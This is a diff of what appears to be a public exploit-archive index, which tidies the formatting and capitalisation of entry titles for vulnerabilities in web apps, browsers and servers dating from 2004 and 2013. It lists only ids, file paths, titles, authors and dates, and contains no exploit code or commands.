-24391,platforms/php/webapps/24391.txt,"Mantis 0.x Multiple Cross-Site Scripting Vulnerabilities",2004-08-21,"Jose Antonio",php,webapps,0 +24390,platforms/php/webapps/24390.txt,"Mantis 0.19 - Remote Server-Side Script Execution Vulnerability",2004-08-21,"Jose Antonio",php,webapps,0 +24391,platforms/php/webapps/24391.txt,"Mantis 0.x - Multiple Cross-Site Scripting Vulnerabilities",2004-08-21,"Jose Antonio",php,webapps,0 24392,platforms/php/webapps/24392.php,"Mantis 0.x New Account Signup Mass Emailing Vulnerability",2004-08-21,"Jose Antonio",php,webapps,0 -24393,platforms/php/webapps/24393.txt,"MyDMS 1.4 - SQL Injection Vulnerability And Directory Traversal Vulnerability",2004-08-21,"Jose Antonio",php,webapps,0 +24393,platforms/php/webapps/24393.txt,"MyDms 1.4 - SQL Injection Vulnerability And Directory Traversal Vulnerability",2004-08-21,"Jose Antonio",php,webapps,0 24394,platforms/multiple/dos/24394.txt,"Opera Web Browser 7.23 JavaScript Denial of Service Vulnerability",2004-08-21,sourvivor,multiple,dos,0 24395,platforms/windows/dos/24395.txt,"Internet Explorer 6.0,Firefox 0.8/0.9.x JavaScript Denial of Service Vulnerability",2004-08-23,MeFakon,windows,dos,0 24396,platforms/php/webapps/24396.txt,"JShop E-Commerce Suite 3.0 - Page.PHP Cross-Site Scripting Vulnerability",2004-08-23,"Dr Ponidi Haryanto",php,webapps,0 24397,platforms/asp/webapps/24397.txt,"Compulsive Media CNU5 News.mdb Database Disclosure Vulnerability",2004-08-23,"Security .Net Information",asp,webapps,0 24398,platforms/linux/local/24398.sh,"IMWheel 1.0 Predictable Temporary File Creation Vulnerability",2004-08-23,I)ruid,linux,local,0 24399,platforms/php/webapps/24399.txt,"PhotoADay Pad_selected Parameter Cross-Site Scripting Vulnerability",2004-08-23,"King Of Love",php,webapps,0 -24400,platforms/cgi/webapps/24400.txt,"Axis Network Camera 2.x And Video Server 1-3 virtualinput.cgi Arbitrary Command Execution",2004-08-23,bashis,cgi,webapps,0 -24401,platforms/cgi/webapps/24401.txt,"axis network camera 2.x and video server 1-3 - Directory Traversal vulnerability",2004-08-23,bashis,cgi,webapps,0 -24402,platforms/cgi/webapps/24402.php,"Axis Network Camera 2.x And Video Server 1-3 HTTP Authentication Bypass",2004-08-23,bashis,cgi,webapps,0 +24400,platforms/cgi/webapps/24400.txt,"Axis Network Camera 2.x And Video Server 1-3 - virtualinput.cgi Arbitrary Command Execution",2004-08-23,bashis,cgi,webapps,0 +24401,platforms/cgi/webapps/24401.txt,"Axis Network Camera 2.x And Video Server 1-3 - Directory Traversal Vulnerability",2004-08-23,bashis,cgi,webapps,0 +24402,platforms/cgi/webapps/24402.php,"Axis Network Camera 2.x And Video Server 1-3 - HTTP Authentication Bypass",2004-08-23,bashis,cgi,webapps,0 24403,platforms/php/webapps/24403.txt,"EGroupWare 1.0 Calendar Module date Parameter XSS",2004-08-23,"Joxean Koret",php,webapps,0 24404,platforms/windows/remote/24404.txt,"Gadu-Gadu 6.0 File Download Filename Obfuscation Weakness",2004-08-23,"Bartosz Kwitkowski",windows,remote,0 24405,platforms/php/webapps/24405.txt,"SWsoft Plesk Reloaded 7.1 - Login_name Parameter Cross-Site Scripting Vulnerability",2004-08-24,sourvivor,php,webapps,0 24406,platforms/linux/local/24406.txt,"GNU a2ps 4.13 File Name Command Execution Vulnerability",2004-08-24,"Rudolf Polzer",linux,local,0 24407,platforms/windows/remote/24407.txt,"Microsoft Internet Explorer 6.0 Resource Detection Weakness",2004-08-24,"GreyMagic Software",windows,remote,0 -24408,platforms/cgi/webapps/24408.txt,"Web-APP.Org WebAPP 0.8/0.9.x Directory Traversal Vulnerability",2004-08-24,"Jerome Athias",cgi,webapps,0 +24408,platforms/cgi/webapps/24408.txt,"Web-APP.Org WebAPP 0.8/0.9.x - Directory Traversal Vulnerability",2004-08-24,"Jerome Athias",cgi,webapps,0 24409,platforms/windows/remote/24409.txt,"Working Resources BadBlue 1.7.x/2.x Unauthorized Proxy Relay Vulnerability",2002-12-11,Texonet,windows,remote,0 24410,platforms/php/webapps/24410.txt,"PHP Code Snippet Library 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2004-08-24,"Nikyt0x Argentina",php,webapps,0 24411,platforms/windows/local/24411.c,"Sysinternals Regmon 6.11 Local Denial of Service Vulnerability",2004-08-25,"Next Generation Security",windows,local,0 24412,platforms/windows/dos/24412.c,"RealVNC Server 4.0 - Remote Denial of Service Vulnerability",2004-08-25,Uz4yh4N,windows,dos,0 24413,platforms/windows/remote/24413.txt,"NullSoft Winamp 2-5 .WSZ File Remote Code Execution Vulnerability",2004-07-26,anonymous,windows,remote,0 -24414,platforms/multiple/remote/24414.txt,"keene digital media server 1.0.2 - Directory Traversal variant vulnerability",2004-08-26,"GulfTech Security",multiple,remote,0 +24414,platforms/multiple/remote/24414.txt,"keene digital media server 1.0.2 - Directory Traversal variant Vulnerability",2004-08-26,"GulfTech Security",multiple,remote,0 24415,platforms/php/webapps/24415.txt,"Nagl XOOPS Dictionary Module 1.0 - Multiple Cross-Site Vulnerabilities",2004-08-28,CyruxNET,php,webapps,0 24416,platforms/windows/remote/24416.txt,"Ipswitch WS_FTP Server 5.0.x CD Command Malformed File Path Remote Denial of Service Vulnerability",2004-08-30,lion,windows,remote,0 24417,platforms/windows/remote/24417.txt,"Xedus Web Server 1.0 test.x username Parameter XSS",2004-09-30,"James Bercegay",windows,remote,0 @@ -21592,7 +21592,7 @@ id,file,description,date,author,platform,type,port 24436,platforms/php/webapps/24436.txt,"Kohana Framework 2.3.3 - Directory Traversal Vulnerability",2013-01-29,Vulnerability-Lab,php,webapps,0 24437,platforms/windows/dos/24437.py,"Apple Quick Time Player (Windows) 7.7.3 - Out of Bound Read",2013-01-29,"Debasish Mandal",windows,dos,0 24438,platforms/php/webapps/24438.txt,"DataLife Engine 9.7 (preview.php) PHP Code Injection Vulnerability",2013-01-28,EgiX,php,webapps,0 -24439,platforms/freebsd/webapps/24439.txt,"PFsense UTM Platform 2.0.1 XSS Vulnerability",2013-01-29,"Dimitris Strevinas",freebsd,webapps,0 +24439,platforms/freebsd/webapps/24439.txt,"PFsense UTM Platform 2.0.1 - XSS Vulnerability",2013-01-29,"Dimitris Strevinas",freebsd,webapps,0 24441,platforms/hardware/webapps/24441.txt,"Netgear SPH200D Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps,0 24442,platforms/hardware/webapps/24442.txt,"D-Link DCS Cameras - Multiple Vulnerabilities",2013-01-31,"Roberto Paleari",hardware,webapps,0 24443,platforms/hardware/webapps/24443.txt,"Buffalo TeraStation TS-Series - Multiple Vulnerabilities",2013-01-31,"Andrea Fabrizi",hardware,webapps,0 @@ -21661,7 +21661,7 @@ id,file,description,date,author,platform,type,port 24517,platforms/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0 24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability",2013-02-19,LiquidWorm,php,webapps,0 24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0 -24526,platforms/windows/remote/24526.py,"MS Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0 +24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0 24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0 24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0 24529,platforms/php/remote/24529.rb,"OpenEMR PHP File Upload Vulnerability",2013-02-20,metasploit,php,remote,0 @@ -21680,9 +21680,9 @@ id,file,description,date,author,platform,type,port 24544,platforms/php/webapps/24544.txt,"MTP Image Gallery 1.0 (edit_photos.php, title param) - XSS Vulnerability",2013-02-26,LiquidWorm,php,webapps,0 24545,platforms/php/webapps/24545.txt,"MTP Guestbook 1.0 - Multiple XSS Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 24546,platforms/php/webapps/24546.txt,"MTP Poll 1.0 - Multiple XSS Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 -24547,platforms/php/remote/24547.rb,"Kordil EDMS 2.2.60rc3 - Unauthenticated Arbitrary File Upload Vulnerability",2013-02-26,metasploit,php,remote,0 +24547,platforms/php/remote/24547.rb,"Kordil EDms 2.2.60rc3 - Unauthenticated Arbitrary File Upload Vulnerability",2013-02-26,metasploit,php,remote,0 24548,platforms/php/remote/24548.rb,"Glossword 1.8.8 & 1.8.12 - Arbitrary File Upload Vulnerability",2013-02-26,metasploit,php,remote,0 -24549,platforms/php/remote/24549.rb,"PolarPearCms PHP File Upload Vulnerability",2013-02-26,metasploit,php,remote,0 +24549,platforms/php/remote/24549.rb,"PolarPearCMS PHP File Upload Vulnerability",2013-02-26,metasploit,php,remote,0 24550,platforms/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps,0 24551,platforms/php/webapps/24551.txt,"Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability",2013-02-27,EgiX,php,webapps,0 24552,platforms/php/webapps/24552.txt,"Wordpress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities",2013-02-27,ebanyu,php,webapps,0 @@ -21695,7 +21695,7 @@ id,file,description,date,author,platform,type,port 24563,platforms/hardware/webapps/24563.txt,"D-Link DSL-2740B (ADSL Router) Authentication Bypass",2013-03-04,"Ivano Binetti",hardware,webapps,0 24564,platforms/php/webapps/24564.txt,"Nconf 1.3 - Multiple SQL Injection",2013-03-04,"Saadi Siddiqui",php,webapps,0 24565,platforms/php/webapps/24565.txt,"SiteCubed MailWorks Professional Authentication Bypass Vulnerability",2004-09-02,"Paul Craig",php,webapps,0 -24566,platforms/php/webapps/24566.txt,"CuteNews 0.88/1.3.x 'index.php' Cross-Site Scripting Vulnerability",2004-09-02,Exoduks,php,webapps,0 +24566,platforms/php/webapps/24566.txt,"CuteNews 0.88/1.3.x - 'index.php' Cross-Site Scripting Vulnerability",2004-09-02,Exoduks,php,webapps,0 24567,platforms/multiple/remote/24567.txt,"Oracle Database Server 8.1.7/9.0.x ctxsys.driload Access Validation Vulnerability",2004-09-03,"Alexander Kornbrust",multiple,remote,0 24568,platforms/windows/remote/24568.html,"Grokster 1.3/2.6,KaZaA Media Desktop 1.3.x/1.6.1/2.0.x ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote,0 24569,platforms/linux/dos/24569.txt,"QNX PPPoEd 2.4/4.25/6.2 - Multiple Local Buffer Overrun Vulnerabilities",2004-09-03,"Julio Cesar Fort",linux,dos,0 @@ -21728,7 +21728,7 @@ id,file,description,date,author,platform,type,port 24597,platforms/multiple/dos/24597.txt,"Mozilla Browser 1.7.x Non-ASCII Hostname Heap Overflow Vulnerability",2004-09-14,"Mats Palmgren and Gael Delalleau",multiple,dos,0 24598,platforms/multiple/remote/24598.txt,"SnipSnap 0.5.2 HTTP Response Splitting Vulnerability",2004-09-14,"Maestro De-Seguridad",multiple,remote,0 24599,platforms/linux/dos/24599.txt,"CUPS 1.1.x UDP Packet Remote Denial of Service Vulnerability",2004-09-15,"Alvaro Martinez Echevarria",linux,dos,0 -24600,platforms/windows/remote/24600.txt,"myserver 0.7 - Directory Traversal vulnerability",2004-09-15,scrap,windows,remote,0 +24600,platforms/windows/remote/24600.txt,"myserver 0.7 - Directory Traversal Vulnerability",2004-09-15,scrap,windows,remote,0 24601,platforms/php/webapps/24601.txt,"BBS E-Market Professional bf_130 (1.3.0) - Multiple File Disclosure Vulnerabilities",2004-09-15,"Jeong Jin-Seok",php,webapps,0 24603,platforms/ios/webapps/24603.txt,"Remote File Manager 1.2 iOS - Multiple Vulnerabilities",2013-03-06,Vulnerability-Lab,ios,webapps,0 24604,platforms/asp/webapps/24604.txt,"Snitz Forums 2000 Down.ASP HTTP Response Splitting Vulnerability",2004-09-16,"Maestro De-Seguridad",asp,webapps,0 @@ -21749,13 +21749,13 @@ id,file,description,date,author,platform,type,port 24619,platforms/cgi/webapps/24619.txt,"EmuLive Server4 Authentication Bypass And Denial of Service Vulnerabilities",2004-09-21,"James Bercegay",cgi,webapps,0 24620,platforms/windows/dos/24620.c,"LeadMind Pop Messenger 1.60 Illegal Character Remote Denial of Service Vulnerability",2004-09-21,"Luigi Auriemma",windows,dos,0 24621,platforms/php/webapps/24621.txt,"Pinnacle ShowCenter 1.51 Web Interface Skin Denial of Service Vulnerability",2004-09-21,"Marc Ruef",php,webapps,0 -24622,platforms/linux/remote/24622.c,"LaTeX2rtf 1.9.15 Remote Buffer Overflow Vulnerability",2004-09-21,"D. J. Bernstein",linux,remote,0 +24622,platforms/linux/remote/24622.c,"LaTeX2rtf 1.9.15 - Remote Buffer Overflow Vulnerability",2004-09-21,"D. J. Bernstein",linux,remote,0 24623,platforms/windows/remote/24623.txt,"Sophos Anti-Virus 3.x Reserved MS-DOS Name Scan Evasion Vulnerability",2004-09-22,"Kurt Seifried",windows,remote,0 24624,platforms/windows/remote/24624.c,"Alt-N MDaemon 6.5.1 SMTP Server Multiple Command Remote Overflow",2004-09-16,D_BuG,windows,remote,0 24625,platforms/asp/webapps/24625.txt,"FreezingCold Broadboard search.asp SQL Injection",2004-09-27,pigrelax,asp,webapps,0 24626,platforms/asp/webapps/24626.txt,"FreezingCold Broadboard profile.asp SQL Injection",2004-09-27,pigrelax,asp,webapps,0 24627,platforms/php/webapps/24627.txt,"Qool CMS 2.0 RC2 - Multiple Vulnerabilities",2013-03-07,LiquidWorm,php,webapps,0 -24629,platforms/php/webapps/24629.txt,"CosCms 1.721 - OS Command Injection",2013-03-07,"High-Tech Bridge SA",php,webapps,0 +24629,platforms/php/webapps/24629.txt,"CosCMS 1.721 - OS Command Injection",2013-03-07,"High-Tech Bridge SA",php,webapps,0 24630,platforms/cgi/webapps/24630.txt,"mnoGoSearch 3.3.12 (search.cgi) - Arbitrary File Read",2013-03-07,"Sergey Bobrov",cgi,webapps,0 24631,platforms/asp/webapps/24631.txt,"PD9 Software MegaBBS 2.0/2.1 thread-post.asp Multiple Header CRLF Injection",2004-09-27,pigrelax,asp,webapps,0 24632,platforms/asp/webapps/24632.txt,"PD9 Software MegaBBS 2.0/2.1 ladder-log.asp Multiple Parameter SQL Injection",2004-09-27,pigrelax,asp,webapps,0 @@ -21764,7 +21764,7 @@ id,file,description,date,author,platform,type,port 24635,platforms/windows/remote/24635.c,"Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (2)",2004-09-27,Coolio,windows,remote,0 24636,platforms/windows/remote/24636.c,"Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (3)",2004-09-27,"Ken Hollis",windows,remote,0 24637,platforms/windows/remote/24637.c,"Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (4)",2004-09-27,"Ken Hollis",windows,remote,0 -24638,platforms/php/webapps/24638.txt,"@lexPHPTeam @lex Guestbook 3.12 Remote PHP File Include Vulnerability",2004-09-27,"Himeur Nourredine",php,webapps,0 +24638,platforms/php/webapps/24638.txt,"@lexPHPTeam @lex Guestbook 3.12 - Remote PHP File Include Vulnerability",2004-09-27,"Himeur Nourredine",php,webapps,0 24639,platforms/windows/dos/24639.c,"Microsoft SQL Server 7.0 - Remote Denial of Service Vulnerability (1)",2004-09-28,"securma massine",windows,dos,0 24640,platforms/windows/dos/24640.c,"Microsoft SQL Server 7.0 - Remote Denial of Service Vulnerability (2)",2004-09-28,"Sebastien Tricaud",windows,dos,0 24641,platforms/php/webapps/24641.txt,"WordPress 1.2 wp-login.php Multiple Parameter XSS",2004-09-28,"Thomas Waldegger",php,webapps,0 @@ -21773,7 +21773,7 @@ id,file,description,date,author,platform,type,port 24644,platforms/php/webapps/24644.txt,"WordPress 1.2 categories.php cat_ID Parameter XSS",2004-09-28,"Thomas Waldegger",php,webapps,0 24645,platforms/php/webapps/24645.txt,"WordPress 1.2 edit.php s Parameter XSS",2004-09-28,"Thomas Waldegger",php,webapps,0 24646,platforms/php/webapps/24646.txt,"WordPress 1.2 edit-comments.php Multiple Parameter XSS",2004-09-28,"Thomas Waldegger",php,webapps,0 -24647,platforms/php/webapps/24647.txt,"parachat 5.5 - Directory Traversal vulnerability",2004-09-28,"Donato Ferrante",php,webapps,0 +24647,platforms/php/webapps/24647.txt,"parachat 5.5 - Directory Traversal Vulnerability",2004-09-28,"Donato Ferrante",php,webapps,0 24648,platforms/php/webapps/24648.txt,"W-Agora 4.1.6 a redir_url.php key Parameter SQL Injection",2004-09-30,"Alexander Antipov",php,webapps,0 24649,platforms/php/webapps/24649.txt,"W-Agora 4.1.6 a forgot_password.php userid Parameter XSS",2004-09-30,"Alexander Antipov",php,webapps,0 24650,platforms/php/webapps/24650.txt,"W-Agora 4.1.6 a download_thread.php thread Parameter XSS",2004-09-30,"Alexander Antipov",php,webapps,0 @@ -21781,7 +21781,7 @@ id,file,description,date,author,platform,type,port 24652,platforms/php/webapps/24652.txt,"W-Agora 4.1.6 a login.php loginuser Parameter XSS",2004-09-30,"Alexander Antipov",php,webapps,0 24653,platforms/windows/remote/24653.txt,"VyPRESS Messenger 3.5 - Remote Buffer Overflow Vulnerability",2004-10-01,"Luigi Auriemma",windows,remote,0 24654,platforms/multiple/remote/24654.txt,"Macromedia ColdFusion MX 6.1 Template Handling Privilege Escalation Vulnerability",2004-10-04,"Eric Lackey",multiple,remote,0 -24655,platforms/php/webapps/24655.txt,"PHPLinks 2.1.x Multiple Input Validation Vulnerabilities",2004-10-05,"LSS Security",php,webapps,0 +24655,platforms/php/webapps/24655.txt,"PHPLinks 2.1.x - Multiple Input Validation Vulnerabilities",2004-10-05,"LSS Security",php,webapps,0 24656,platforms/php/remote/24656.txt,"PHP 4.x/5.0.1 PHP_Variables Remote Memory Disclosure Vulnerability",2004-09-15,"Stefano Di Paola",php,remote,0 24657,platforms/php/webapps/24657.txt,"BlackBoard Internet Newsboard System 1.5.1 - Remote File Include Vulnerability",2004-10-06,"Lin Xiaofeng",php,webapps,0 24658,platforms/php/webapps/24658.txt,"Brooky CubeCart 2.0.1 - SQL Injection Vulnerability",2004-10-06,"Pedro Sanches",php,webapps,0 @@ -21790,7 +21790,7 @@ id,file,description,date,author,platform,type,port 24661,platforms/php/webapps/24661.txt,"DCP-Portal 3.7/4.x/5.x announcement.php cid Parameter XSS",2004-10-06,"Alexander Antipov",php,webapps,0 24662,platforms/php/webapps/24662.txt,"DCP-Portal 3.7/4.x/5.x news.php cid Parameter XSS",2004-10-06,"Alexander Antipov",php,webapps,0 24663,platforms/php/webapps/24663.txt,"DCP-Portal 3.7/4.x/5.x contents.php cid Parameter XSS",2004-10-06,"Alexander Antipov",php,webapps,0 -24664,platforms/php/webapps/24664.txt,"DCP-Portal 3.7/4.x/5.x Multiple HTML Injection Vulnerabilities",2004-10-06,"Alexander Antipov",php,webapps,0 +24664,platforms/php/webapps/24664.txt,"DCP-Portal 3.7/4.x/5.x - Multiple HTML Injection Vulnerabilities",2004-10-06,"Alexander Antipov",php,webapps,0 24665,platforms/php/webapps/24665.txt,"DCP-Portal 3.7/4.x/5.x Calendar.PHP HTTP Response Splitting Vulnerability",2004-10-06,"Alexander Antipov",php,webapps,0 24666,platforms/asp/webapps/24666.txt,"Microsoft ASP.NET 1.x URI Canonicalization Unauthorized Web Access Vulnerability",2004-10-06,anonymous,asp,webapps,0 24667,platforms/php/webapps/24667.txt,"Wordpress 1.2 Wp-login.PHP HTTP Response Splitting Vulnerability",2004-10-07,"Chaotic Evil",php,webapps,0 @@ -21816,20 +21816,20 @@ id,file,description,date,author,platform,type,port 24687,platforms/windows/remote/24687.txt,"Microsoft Outlook Express 4.x/5.x/6.0 Plaintext Email Security Policy Bypass Vulnerability",2004-10-18,http-equiv,windows,remote,0 24688,platforms/windows/remote/24688.pl,"best software saleslogix 2000.0 - Multiple Vulnerabilities",2004-10-18,"Carl Livitt",windows,remote,0 24689,platforms/php/webapps/24689.sh,"cPanel 9.9.1 -R3 Front Page Extension Installation Information Disclosure",2004-10-18,"Karol Wiesek",php,webapps,0 -24690,platforms/unix/webapps/24690.txt,"IBM Lotus Domino 6.x Cross-Site Scripting and HTML Injection Vulnerabilities",2004-10-18,"Juan C Calderon",unix,webapps,0 +24690,platforms/unix/webapps/24690.txt,"IBM Lotus Domino 6.x - Cross-Site Scripting and HTML Injection Vulnerabilities",2004-10-18,"Juan C Calderon",unix,webapps,0 24691,platforms/multiple/dos/24691.txt,"Vypress Tonecast 1.3 - Remote Denial of Service Vulnerability",2004-10-19,"Luigi Auriemma",multiple,dos,0 24692,platforms/php/webapps/24692.txt,"Jan Erdmann Jebuch 1.0 HTML Injection Vulnerability",2004-10-19,PuWu,php,webapps,0 24693,platforms/windows/remote/24693.txt,"Microsoft Internet Explorer 5.x Valid File Drag and Drop Embedded Code Vulnerability",2004-10-20,http-equiv,windows,remote,0 24694,platforms/linux/local/24694.c,"Apache 1.3.x mod_include Local Buffer Overflow Vulnerability",2004-10-18,xCrZx,linux,local,0 24696,platforms/linux/remote/24696.c,"Linux Kernel 2.6.x IPTables Logging Rules Integer Underflow Vulnerability",2004-11-21,"Richard Hart",linux,remote,0 24697,platforms/php/webapps/24697.txt,"Serendipity 0.x Exit.PHP HTTP Response Splitting Vulnerability",2004-10-21,ChaoticEvil,php,webapps,0 -24698,platforms/php/webapps/24698.txt,"UBBCentral UBB.threads 3.4/3.5 Dosearch.PHP SQL Injection Vulnerability",2004-10-21,"Florian Rock",php,webapps,0 +24698,platforms/php/webapps/24698.txt,"UBBCentral UBB.threads 3.4/3.5 DoSearch.PHP SQL Injection Vulnerability",2004-10-21,"Florian Rock",php,webapps,0 24699,platforms/windows/dos/24699.txt,"Microsoft Windows XP WAV File Handler Denial of Service Vulnerability",2004-10-22,HexView,windows,dos,0 24700,platforms/cgi/webapps/24700.txt,"Netbilling NBMEMBER Script Information Disclosure Vulnerability",2004-10-22,ls,cgi,webapps,0 -24701,platforms/multiple/remote/24701.txt,"OpenWFE 1.4.x Remote Cross-Site Scripting And Connection Proxy Vulnerabilities",2004-10-25,"Joxean Koret",multiple,remote,0 +24701,platforms/multiple/remote/24701.txt,"OpenWFE 1.4.x - Remote Cross-Site Scripting And Connection Proxy Vulnerabilities",2004-10-25,"Joxean Koret",multiple,remote,0 24702,platforms/php/webapps/24702.txt,"MoniWiki 1.0/1.1 Wiki.PHP Cross-Site Scripting Vulnerability",2004-10-25,"Jeremy Bae",php,webapps,0 -24703,platforms/cgi/webapps/24703.txt,"LinuxStat 2.x Remote Directory Traversal Vulnerability",2004-10-25,anonymous,cgi,webapps,0 -24704,platforms/linux/remote/24704.c,"Libxml2 Multiple Remote Stack Buffer Overflow Vulnerabilities",2004-10-26,Sean,linux,remote,0 +24703,platforms/cgi/webapps/24703.txt,"LinuxStat 2.x - Remote Directory Traversal Vulnerability",2004-10-25,anonymous,cgi,webapps,0 +24704,platforms/linux/remote/24704.c,"Libxml2 - Multiple Remote Stack Buffer Overflow Vulnerabilities",2004-10-26,Sean,linux,remote,0 24705,platforms/windows/dos/24705.txt,"Microsoft Internet Explorer 6.0 Font Tag Denial of Service Vulnerability",2004-10-26,"Jehiah Czebotar",windows,dos,0 24707,platforms/multiple/remote/24707.txt,"Google Desktop Search Remote Cross-Site Scripting Vulnerability",2004-10-26,"Salvatore Aranzulla",multiple,remote,0 24708,platforms/windows/dos/24708.txt,"Quicksilver Master of Orion III 1.2.5 - Multiple Remote Denial of Service Vulnerabilities",2004-10-27,"Luigi Auriemma",windows,dos,0 @@ -21838,9 +21838,9 @@ id,file,description,date,author,platform,type,port 24712,platforms/windows/remote/24712.txt,"Microsoft Internet Explorer 6.0 TABLE Status Bar URI Obfuscation Weakness",2004-10-28,"Benjamin Tobias Franz",windows,remote,0 24713,platforms/multiple/remote/24713.txt,"Global Spy Software Cyber Web Filter 2 IP Filter Bypass Vulnerability",2004-10-29,anonymous,multiple,remote,0 24714,platforms/windows/remote/24714.txt,"Microsoft Internet Explorer 6.0 HTML Form Tags URI Obfuscation Weakness",2004-10-30,http-equiv,windows,remote,0 -24715,platforms/multiple/dos/24715.txt,"Caudium 1.x Remote Denial of Service Vulnerability",2004-10-30,"David Gourdelier",multiple,dos,0 +24715,platforms/multiple/dos/24715.txt,"Caudium 1.x - Remote Denial of Service Vulnerability",2004-10-30,"David Gourdelier",multiple,dos,0 24716,platforms/osx/remote/24716.txt,"Apple Safari 1.2 Web Browser TABLE Status Bar URI Obfuscation Weakness",2004-11-01,"Gilbert Verdian",osx,remote,0 -24717,platforms/asp/webapps/24717.txt,"WebHost Automation Helm Control Panel 3.1.x Multiple Input Validation Vulnerabilities",2004-11-02,"Behrang Fouladi",asp,webapps,0 +24717,platforms/asp/webapps/24717.txt,"WebHost Automation Helm Control Panel 3.1.x - Multiple Input Validation Vulnerabilities",2004-11-02,"Behrang Fouladi",asp,webapps,0 24718,platforms/php/webapps/24718.txt,"Goolery 0.3 viewpic.php conversation_id Parameter XSS",2004-11-02,Lostmon,php,webapps,0 24719,platforms/php/webapps/24719.txt,"Goolery 0.3 viewalbum.php page Parameter XSS",2004-11-02,Lostmon,php,webapps,0 24720,platforms/windows/remote/24720.txt,"Microsoft Internet Explorer 6.0 IFRAME Status Bar URI Obfuscation Weakness",2004-11-02,"Benjamin Tobias Franz",windows,remote,0 @@ -21852,11 +21852,11 @@ id,file,description,date,author,platform,type,port 24726,platforms/windows/dos/24726.txt,"Software602 602 LAN Suite Multiple Remote Denial of Service Vulnerabilities",2004-11-06,"Luigi Auriemma",windows,dos,0 24727,platforms/windows/remote/24727.txt,"Microsoft Internet Explorer 6.0 - Local Resource Enumeration Vulnerability",2004-11-08,"Benjamin Tobias Franz",windows,remote,0 24728,platforms/windows/remote/24728.txt,"Internet Explorer 6.0, Firefox 0.x,Netscape 7.x IMG Tag Multiple Vulnerabilities",2004-11-10,"Wolfgang Schwarz",windows,remote,0 -24729,platforms/php/webapps/24729.txt,"webcalendar 0.9.x Multiple Vulnerabilities",2004-11-10,"Joxean Koret",php,webapps,0 -24730,platforms/multiple/remote/24730.txt,"04webserver 1.42 Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",multiple,remote,0 +24729,platforms/php/webapps/24729.txt,"webcalendar 0.9.x - Multiple Vulnerabilities",2004-11-10,"Joxean Koret",php,webapps,0 +24730,platforms/multiple/remote/24730.txt,"04webserver 1.42 - Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",multiple,remote,0 24731,platforms/php/webapps/24731.txt,"Aztek Forum 4.0 - Multiple Input Validation Vulnerabilities",2004-11-12,"benji lemien",php,webapps,0 24732,platforms/php/webapps/24732.txt,"Phorum 5.0.x FOLLOW.PHP SQL Injection Vulnerability",2004-11-11,"Janek Vind",php,webapps,0 -24733,platforms/windows/dos/24733.pl,"SecureAction Research Secure Network Messenger 1.4.x Remote Denial of Service Vulnerability",2004-11-12,"Luigi Auriemma",windows,dos,0 +24733,platforms/windows/dos/24733.pl,"SecureAction Research Secure Network Messenger 1.4.x - Remote Denial of Service Vulnerability",2004-11-12,"Luigi Auriemma",windows,dos,0 24734,platforms/php/webapps/24734.txt,"chacmool Private Message System 1.1.3 send.php tid Parameter XSS",2004-11-12,"digital ex",php,webapps,0 24735,platforms/php/webapps/24735.txt,"chacmool Private Message System 1.1.3 send.php Arbitrary Message Access",2004-11-12,"digital ex",php,webapps,0 24736,platforms/php/webapps/24736.txt,"PHPWebSite 0.7.3/0.8.x/0.9.3 User Module HTTP Response Splitting Vulnerability",2004-11-04,"Maestro De-Seguridad",php,webapps,0 @@ -21895,7 +21895,7 @@ id,file,description,date,author,platform,type,port 24771,platforms/php/webapps/24771.txt,"KorWeblog 1.6.2 - Remote Directory Listing Vulnerability",2004-11-24,"Jeremy Bae",php,webapps,0 24772,platforms/php/webapps/24772.txt,"Zwiki 0.10/0.36.2 Cross-Site Scripting Vulnerability",2004-11-24,"Jeremy Bae",php,webapps,0 24773,platforms/jsp/webapps/24773.txt,"JSPWiki 2.1 Cross-Site Scripting Vulnerability",2004-11-24,"Jeremy Bae",jsp,webapps,0 -24774,platforms/multiple/remote/24774.java,"Open DC Hub 0.7.14 Remote Buffer Overflow Vulnerability",2004-11-24,"Donato Ferrante",multiple,remote,0 +24774,platforms/multiple/remote/24774.java,"Open DC Hub 0.7.14 - Remote Buffer Overflow Vulnerability",2004-11-24,"Donato Ferrante",multiple,remote,0 24775,platforms/windows/dos/24775.html,"Microsoft Internet Explorer 6.0 Infinite Array Sort Denial of Service Vulnerability",2004-11-25,"Berend-Jan Wever",windows,dos,0 24776,platforms/windows/dos/24776.html,"Mozilla Firefox 0.8/0.9/0.10 Infinite Array Sort Denial of Service Vulnerability",2004-11-25,"Berend-Jan Wever",windows,dos,0 24777,platforms/linux/dos/24777.txt,"Linux Kernel 2.4.x / 2.6.x - Local Denial of Service And Memory Disclosure Vulnerabilities",2004-11-25,"Florian Heinz",linux,dos,0 @@ -21904,7 +21904,7 @@ id,file,description,date,author,platform,type,port 24780,platforms/osx/dos/24780.html,"Apple Safari Web Browser 1.x Infinite Array Sort Denial of Service Vulnerability",2004-11-25,"Berend-Jan Wever",osx,dos,0 24781,platforms/multiple/dos/24781.html,"Mozilla Camino Web Browser 0.7/0.8 Infinite Array Sort Denial of Service Vulnerability",2004-11-25,"Berend-Jan Wever",multiple,dos,0 